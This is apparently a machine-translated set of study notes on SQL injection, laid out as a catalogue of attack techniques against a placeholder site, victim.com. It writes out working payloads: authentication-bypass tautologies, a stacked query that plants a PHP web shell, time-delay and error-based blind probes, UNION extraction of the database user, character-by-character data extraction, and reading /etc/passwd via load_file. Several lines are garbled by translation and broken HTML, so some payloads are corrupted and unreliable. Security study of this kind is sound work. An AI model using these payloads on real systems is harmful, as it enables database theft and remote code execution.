Partial finishing ...
What is SQL injection?
Simple example, for a shopping site, can be allowed to search, price less than a certain value of goods
This value can be entered by the user, for example, 100
But for the user, if input, 1 ' OR ' = ' 1
The result is the resulting SQL,
SELECT * from Productstbl WHERE < ' 100.00 ' OR ' 1 ' = ' 1 ' ORDER by ProductDescription;
So that users can get all the product information
Let's look at an example,
For user authentication, you need to enter a user name and password
But if the user injects code into the password,
SELECT userid from cmsusers WHERE User = ' Foo ' and = ' Password ' OR ' 1 ' = ' 1 ';
This makes it possible to verify
Injection type
inline SQL injection (inline SQL injection)
Inline injection is a query injected with some SQL code, the original query will still be executed all
String inline injection
Example
With the following SQL, all passwords in the users table are updated to New_password, which is quite serious
UPDATEUsersSETPassword= 'New_password'WHEREUsername= 'Bob' andPassword= 'Old_password' OR '1'='1'
numeric values Inline injection
Note that you do not need to add the opening and closing single quote delimiters when injecting numbers.
SELECT * from Messages WHERE uid=1=1 /* */ORDER by received;
Because the 1=1 condition (or) is injected, the database returns all rows in the message table, not just the rows sent to a user
End-of-SQL injection
Terminating SQL injection refers to the successful conclusion of the original query statement by commenting out the remainder of the original query statement when injecting the SQL code.
Example
Inject "' or 1=1;--" code
SELECT * from Administrators WHERE = "' or 1 = 1; -- ' and password = ';
Because of the 1=1 persistent condition, the statement returns all rows in the Administrators table.
SELECT * from Administrators WHERE = ' Admin ' /* ' and password = ' */ ";
Sometimes you may find that you cannot use double hyphens (-) on certain occasions.
In this case, you can replace the original comment in the SQL statement with a multiline comment (/* */).
This technique requires multiple vulnerable parameters, and you need to understand where these parameters are located in the SQL statement.
Execute multiple statements
SQL Server 6.0 introduces a server-side cursor in its schema, allowing strings containing multiple statements to be executed on the same connection handle.
All SQL Server versions after 6.0 support this feature and allow the following statements to be executed:
SELECT foo from bar; SELECT Foo2 from Bar2;
MySQL also introduced this feature in versions 4.1 and later, but it does not support this feature by default.
To take advantage of this technique, you first need to be able to terminate the first statement so that you can then connect any SQL code.
Example
http//Www.victim.com/Search.php?s=Test'; SELECT'<? php echo Shell_exec($_get["cmd"]);?>'Into OUTFILE'/var/Www/Victim.com/shell.php';--
Time delay
Time delay is a powerful technique, although the Web server can hide errors or data, but must wait for the database to return the results, so you can use it to confirm the existence of SQL injection. This technique is particularly suitable for blinds.
The Microsoft SQL Server server contains a built-in command to introduce delays to the query: WAITFOR delay ' hours:minutes:seconds '.
For example, to send the following request to the victim Web server, the server's response would take approximately 5 seconds:
http://www.victim.com/basket.aspx?uid=; waitfor ' 0:0:5 '; --
The delay in the server response convinced us that we were injecting SQL code into the backend database
The MySQL database does not have a command equivalent to WAITFOR delay, but it can use a function that takes a long time to introduce the delay. The BENCHMARK function is a good choice.
Mysql> SELECT BENCHMARK (10000000,encode (' hello ', ' Mom '));
Injection attack mode
Injection first to determine what the backend is exactly what the database, specifically what version
The blind method depends on whether the Web server will return the back-end error or return value to you.
The basic method is to verify with the different syntax of the database,
For example, for the concatenation of strings, the syntax of each library is different.
Extracting data through UNION statements
By union you can add your own SQL and get more information.
SELECT column-1,column-2,...,column-N from Table-1UNIONSELECT column-1,column-2,...,column-N from Table-2
The limitation of this method is that
? The queries must return exactly the same number of columns.
? The data in the corresponding columns of the statements must is of the same (or at least compatible) types.
How do you ensure that your SQL and original SQL have the same column number and type?
The way is, you can try each one,
http//Www.victim.com/Products.asp?id= A+Union+Select+NULL--http//Www.victim.com/Products.asp?id= A+Union+Select+NULL,NULL--http//Www.victim.com/Products.asp?id= A+Union+Select+NULL,NULL,NULL--
Keep trying until you get an error.
The same is true for types,
http//Www.victim.com/Products.asp?id= A+Union+Select+' Test ',NULL,NULL,NULLhttp://Www.victim.com/Products.asp?id= A+Union+Select+NULL, ' Test ',NULL,NULL
Try to not error, description type matching
Example
For instance, the following URL would retrieve both the name of the current user and the name of the current database:
Http://www.victim.com/products.asp?id=12+union+select+NULL,system_user,db_name (), NULL
Using conditional statements
The conditional syntax for various databases,
Approach 1:time-based
On SQL Server, for instance, one of the first things your might want to know are whether the user performing the queries is The system administrator account, SA.
http://www.victim.com/products.asp?id=12;if+ (system_user= ' sa ') +waitfor+delay+ ' 0:0:5 '--
Approach 2:error-based
Http://www.victim.com/products.asp?id=12/is_srvrolemember (' sysadmin ')
If the following function returns 1, then 12/1 is still equal to 12; If the return 0,12/0 is obviously an exception, then the value of the subsequent function can be inferred
As an example, let's see how we can use a case statement to check, with our E-commerce application, whether the current user Is SA:
http://www.victim.com/products.asp?id=12/(case+when+ (system_user= ' sa ') +then+1+else+0+end)
Approach 3:content-based
Can avoid generating errors,
Http://www.victim.com/products.asp?id=12%2B (case+when+ (system_user+=+ ' sa ') +then+1+else+0+end)
Like the case above,
To change the subject to redundancy
Working with Strings
Http://www.victim.com/search.asp?brand=acme
Equal To,
HTTP://WWW.VICTIM.COM/SEARCH.ASP?BRAND=ACM '%2b ' e or Http://www.victim.com/search.asp?brand=ac '%2b ' m '%2b ' E
Because%2b, Escape is +
is also equivalent to,
Http://www.victim.com/search.asp?brand=ac '%2bchar (109)%2b ' E
This can be injected as follows,
Http://www.victim.com/search.asp?brand=ac '%2bchar (108%2b (case+when+ (system_user+=+ ' sa ') +then +1+else+0+end)% 2 B ' E
Judging by the conditions,
Http://www.victim.com/search.asp?brand=acme
Or
Http://www.victim.com/search.asp?brand=acle
The above attack only gets 1 bits of data, which can be extended to Len's judgment in order to determine Len using a dichotomy
+8) +then+1+else+0+end "href=" http://www.victim.com/products.asp?id=10/(case+when+ (Len (system_user) +>+8) +then +1+else+0+end ">+8" +then+1+else+0+end "href=" http://www.victim.com/products.asp?id=10/(case+when+ (Len (system_ User) +>+8) +then+1+else+0+end ">http://www.victim.com/products.asp?id=10/(case+when+ (Len (system_user) +> +8) +then+1+else+0+end
You can then use the dichotomy to find each char,
+128) +then+1+else+0+end) "href=" http://www.victim.com/products.asp?id=12/(case+when+ (ASCII (substring SYSTEM_USER) +>+128) +then+1+else+0+end ">+128) +then+1+else+0+end)" href= "http://www.victim.com/ products.asp?id=12/(case+when+ (ASCII (substring (select+system_user)) +>+128) +then+1+else+0+end ">http ://www.victim.com/products.asp?id=12/(case+when+ (ASCII (substring (select+system_user),) +>+128) +then+1+ Else+0+end)
Exploiting the operating system
Accessing the file system
Read
The Load_file function also handles binary files transparently, which means, and a little bit of finesse we can use T He function to read binary files from the remote host easily:
Such as
' Union Select Load_file ('/etc/passwd ') #
INSERT INTO Foo set line=load_file ('/tmp/temp.bin ');
Write
AAA ' Union Select NULL, ' SensePost 2008\n ' into DumpFile '/tmp/sp.txt ' #
Executing operating system commands
Exploiting Second-order SQL Injection
The first attack request, just put the attack script, write storage, such as database
The second request, the attack script will be read out from the library, triggering the execution, this will produce a real attack
Finding Second-order Vulnerabilities
Second-order SQL Injection is more difficult to detect than first-order vulnerabilities, because your exploit is submitted In one request and executed in the application ' s handling of a different request.
SQL injection attacks and defenses